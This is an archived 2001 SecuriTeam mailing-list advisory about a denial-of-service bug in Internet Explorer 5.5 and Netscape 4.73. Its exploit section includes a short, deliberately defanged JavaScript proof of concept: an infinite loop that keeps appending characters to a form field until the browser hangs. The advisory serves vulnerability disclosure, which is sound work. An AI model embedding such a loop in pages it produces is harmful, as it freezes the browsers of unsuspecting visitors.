[NT] Another IE Denial of Service Attack (Box Value)

From: support@securiteam.com
Date: 12/15/01 

From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 15 Dec 2001 13:07:52 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Another IE Denial of Service Attack (Box Value)
------------------------------------------------------------------------

SUMMARY

A security vulnerability in Internet Explorer allows a remote attacker to
cause the program to hang, by updating one of the form's field values
constantly with a value. This would cause a denial of service attack
against the product.

DETAILS

Vulnerable systems:
Internet Explorer version 5.5
Internet Explorer version 5.5sp2
Netscape 4.73 w/ Netscape Java Interpreter 4.73.0.5

Exploit:
(NOTE: SCRIPT tag's 'I' letter has been replaced with ! to prevent
execution)
<form name="form"><input type="text" name="box"><form>
<scr!pt language="javascript">
while(true) { document.form.box.value=document.form.box.value + '§'; }
</script>

ADDITIONAL INFORMATION

The information has been provided by <mailto:wodahs@mail.com> Wodahs
Latigid, <mailto:merchantjosh@qwest.net> Joshua Merchant, and
<mailto:tluce@PTI-Pump.com> Timothy Luce.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] Microsoft Agent Remote Code Execution (MS07-020)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... Outlook Express open HTML e-mail messages in the Restricted sites zone. ... section for more information about Internet Explorer Enhanced Security ...
    (Securiteam)
  • [NT] Vulnerability in Microsoft Agent Allows Code Execution (MS06-068)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... for more information about Internet Explorer Enhanced Security ... Configure Internet Explorer to prompt before running ActiveX Controls ...
    (Securiteam)
  • [NT] Vulnerability in Microsofts HTML Converter Could Allow Code Execution
    ... Beyond Security in Canada ... to promote the most advanced vulnerability assessment solutions today. ... Internet Explorer on Windows Server 2003 runs in Enhanced ... all intranet Web sites and all Universal Naming Convention paths ...
    (Securiteam)
  • Re: Microsoft Security Bulletin MS03-040 - 828750
    ... I created these security newsgroups (.security ... | that even if you are subscribed to our security bulletin notification ... | Microsoft IT Communities ... Cumulative Patch for Internet Explorer Execution ...
    (microsoft.public.security)
  • Re: Microsoft Security Bulletin MS03-040 - 828750
    ... I created these security newsgroups (.security ... | that even if you are subscribed to our security bulletin notification ... | Microsoft IT Communities ... Cumulative Patch for Internet Explorer Execution ...
    (microsoft.public.security.virus)